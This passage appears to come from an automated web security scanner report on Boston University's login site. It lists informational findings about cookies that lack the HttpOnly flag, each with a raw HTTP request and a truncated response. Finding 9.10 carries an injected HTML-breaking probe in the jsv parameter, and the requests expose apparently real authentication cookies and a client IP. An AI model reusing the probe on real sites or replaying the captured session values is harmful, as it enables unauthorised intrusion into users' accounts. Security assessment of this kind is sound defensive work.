The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; isMobile=false_1.1; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:03 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Vary: Cookie
Last-Modified: Wed, 01 Jun 2005 12:35:47 GMT
ETag: "41bd040100b7-e36-3f87a5c37eec0"
Accept-Ranges: bytes
Content-Length: 3638
X-BU-Main-Uniqueid: ToyYUwrxHDsAAE03@Z8AAAAM
X-BU-Duration: D=7732
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/plain

..............h...&... ..............(....... ...........@...........................XX..........rrr.....''........==................................................................................
...[SNIP]...

9.6. https://weblogin.bu.edu/lib/css/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /lib/css/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lib/css/style.css HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; isMobile=false_1.1; wl4cap=1317836819%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:47:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Tue, 16 Aug 2011 08:06:23 GMT
ETag: "9c68040100b7-1b0f-4aa9adb03fdc0"
Accept-Ranges: bytes
Content-Length: 6927
X-BU-Main-Uniqueid: ToyYFArxHDsAAE5mG4MAAAAQ
X-BU-Duration: D=7569
X-BU-Backend: (null) (null)
Connection: close
Content-Type: text/css

/*
   Project: BU WebLogin
   Author(s): Jon Brousseau & Tim Wright
   Created: March 2011
*/

/* RESET --------------------------------------------------------- */

html,body,div,span,object,
iframe,h1,h2,
...[SNIP]...

9.7. https://weblogin.bu.edu/lib/images/form-bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /lib/images/form-bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lib/images/form-bg.jpg HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; wl4cap=1317836819%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:47:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Wed, 13 Apr 2011 20:04:04 GMT
ETag: "9c6a040100b7-13f-4a0d24f7cd500"
Accept-Ranges: bytes
Content-Length: 319
X-BU-Main-Uniqueid: ToyYFArxHDsAAE5lGRkAAAAP
X-BU-Duration: D=7668
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/jpeg

......Exif..II*.................Ducky.......<......Adobe.d....................    ...    .......

.

.......................................................................................................
...[SNIP]...

9.8. https://weblogin.bu.edu/lib/images/subsig-large.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /lib/images/subsig-large.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lib/images/subsig-large.gif HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; wl4cap=1317836819%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:47:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Wed, 13 Apr 2011 20:04:04 GMT
ETag: "9c6b040100b7-4dd-4a0d24f7cd500"
Accept-Ranges: bytes
Content-Length: 1245
X-BU-Main-Uniqueid: ToyYFArxHDsAAE4ID3cAAAAF
X-BU-Duration: D=7457
X-BU-Backend: (null) (null)
Connection: close
Content-Type: image/gif

GIF89a..#..*....@@@.........000......```.DDPPP... .ff...ppp.......ww.........."".UU.33................................................................................................................
...[SNIP]...

9.9. https://weblogin.bu.edu/lib/scripts/BUweblogin.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /lib/scripts/BUweblogin.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lib/scripts/BUweblogin.js HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: https://weblogin.bu.edu//web@login3?jsv=1.5p&br=un&fl=0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; isMobile=false_1.1; wl4cap=1317836819%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:47:00 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
Last-Modified: Mon, 01 Aug 2011 19:37:10 GMT
ETag: "9c6c040100b7-aba-4a976c1d46580"
Accept-Ranges: bytes
Content-Length: 2746
X-BU-Main-Uniqueid: ToyYFArxHDsAAE5UEuAAAAAH
X-BU-Duration: D=7839
X-BU-Backend: (null) (null)
Connection: close
Content-Type: application/x-javascript

var IE4 = document.all;
var NS4 = document.layers;
function enter_key_trap (e) {
var keyPressed;
if (NS4)
keyPressed = String.fromCharCode(e.which);
else if (IE4)
keyPressed = String.fro
...[SNIP]...

9.10. https://weblogin.bu.edu/web@login3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /web@login3?jsv=1.5p4a644%22%3E%3Ca%3E54f2c5b14d7&br=un&fl=0 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:49:54 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: up
X-UniqueID: ToyYwgrxHDsAAFl@RhA
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:49:54 GMT
Set-Cookie: wl4cap=1317836995%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; path=/
X-BU-Main-Uniqueid: ToyYwgrxHDsAAFiBZSsAAABF
X-BU-Duration: D=910450
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 2758

<!DOCTYPE html>
<html class="no-js">
<head>
<meta charset="UTF-8">
<title>Boston University | Web Login</title>

<!-- InstanceBegin name="header_template" -->

<link rel="stylesheet" type="t
...[SNIP]...

9.11. https://weblogin.bu.edu/web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317836815/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/ip%3d50.23.123.106%26type%3dup%26ret%3dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bu.edu/directory/change-entry.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.16.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); isMobile=false_1.2; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:48:01 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToyYUQrxHDsAAEIXd9A
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:48:01 GMT
X-BU-Main-Uniqueid: ToyYUQrxHDsAAFC0OSgAAAAR
X-BU-Duration: D=101903
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

9.12. https://weblogin.bu.edu/web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837446/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837446.11881 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ezproxy.bu.edu/login
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; wl4data=5d0e3d8d3bedbc6b44f91648dd40e831%3Acussp-srv4%2Cip%3D50.23.123.106%26type%3Dup%26ret%3Dhttp%253a%252f%252fwww%252ebu%252eedu%252fphpbin%252fchange%252dentry%252fchange%252ephp%253fweblogin%255ftag%253d45f697954443446474d6d41414444695154695%2526weblogin%255fgotauth%253d1; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 17:59:24 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: Toya-ArxHDsAAFvabkM
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 17:59:24 GMT
X-BU-Main-Uniqueid: Toya-ArxHDsAAFIjVuMAAAAP
X-BU-Duration: D=24167271
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

9.13. https://weblogin.bu.edu/web@login3/1317837562/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837562/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837562/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://people.bu.edu/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.17.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wl4cap=1317836900%2Cjsver%3D%2Cbrowser%3Dun%2Cflash%3D0; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; isMobile=false_1.2

Response

HTTP/1.1 401 Authorization Required
Date: Wed, 05 Oct 2011 18:01:53 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
WWW-Authenticate: Basic realm="BU login and Kerberos passwd 05Oct 14:0225"
X-BU-Tag: auth
X-UniqueID: ToybkQrxHDsAAGa7HzE
Content-Type: text/html; charset=iso-8859-1
X-BU-Main-Uniqueid: ToybkQrxHDsAAGazeO0AAAA@
X-BU-Duration: D=40193402
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 397

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>401 Authorization Required</TITLE>
</HEAD><BODY>
<H1>Authorization Required</H1>
This server could not verify that you
are author
...[SNIP]...

9.14. https://weblogin.bu.edu/web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837693/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837693.11207 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.19.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:04:54 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToycRgrxHDsAAFvabks
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 18:04:54 GMT
X-BU-Main-Uniqueid: ToycRgrxHDsAAGaoW@YAAAAi
X-BU-Duration: D=24104411
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

9.15. https://weblogin.bu.edu/web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837749/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837749.14309 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wantsMobile=false_1.2_default; weblogin3=5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4; wl4key=879da643f56a35633df8a460709266f3%3Acussp-srv3; credsrv3=cussp-srv4; wl4data=1361f4db6536328d0e4837bb82138064%3Acussp-srv4%2Ckey%3D1317837446.11881; wl4cap=1317837588%2Cjsver%3D1.5p%2Cbrowser%3Dun%2Cflash%3D0; __utma=21468840.20308800.1317665238.1317665238.1317836711.2; __utmb=21468840.20.9.1317836730067; __utmc=21468840; __utmz=21468840.1317665238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bu_session=a48b5fc44e9c3778dbfa93d21a2f878d%3Acussp-srv3; isMobile=false_1.2

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 18:05:39 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Set-Cookie: isMobile=false_1.1; path=/; domain=.bu.edu
X-BU-Tag: CHECK-SHORTEN(length) https://127.0.0.1//web@login3
X-UniqueID: ToyccwrxHDsAAGWJAWs
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html
Expires: Wed, 05 Oct 2011 18:05:39 GMT
X-BU-Main-Uniqueid: ToyccwrxHDsAAGarZZ4AAAAq
X-BU-Duration: D=24106310
X-BU-Backend: (null) (null)
Connection: close
Content-Length: 5622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Weblogin Browser Check</title>
<!-- BUTag(check) -->
<script LANGUAGE=
...[SNIP]...

9.16. https://weblogin.bu.edu/web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://weblogin.bu.edu
Path:   /web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /web@login3/1317837809/5d0e3d8d3bedbc6b44f91648dd40e831:cussp-srv4/key=1317837809.14786 HTTP/1.1
Host: weblogin.bu.edu
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://alumni.bu.edu/olc/pub/BUAR/login/BUAR-extauth.cgi?url=http%3a//alumni.bu.edu/olc/membersonly/BUAR/mypage.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
